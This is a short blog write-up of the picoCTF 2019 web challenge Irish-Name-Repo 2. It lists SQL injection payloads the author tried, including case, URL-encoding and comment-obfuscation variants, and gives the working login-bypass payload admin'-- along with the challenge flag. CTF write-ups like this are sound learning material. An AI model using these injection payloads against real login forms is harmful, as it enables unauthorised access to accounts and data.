DEV Community

David Disu
David Disu

Posted on

Irish-Name-Repo 2 - picoCTF '19 (web)

Challenge description

Coming from this challenge's prequel Irish-Name-Repo 1 - picoCTF '19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
' oR 1=1 -- - case manipulation
%27%20%20%6f%72%20%31%3d%31%20%2d%2d- URL encoding
'/**/ or /**/ 1=1 /**/ -- - Comment obfuscation
00%' or 1=1 -- - null hex encoding
...and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.

STEPS TO SOLUTION
use admin'-- in the username parameter.

Breakdown:

  • admin - value for username query.
  • ' - closes the input string.
  • -- - comments out the remaining query.

Challenge solved

FLAG: picoCTF{m0R3_SQL_plz_fa983901}

PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

Top comments (0)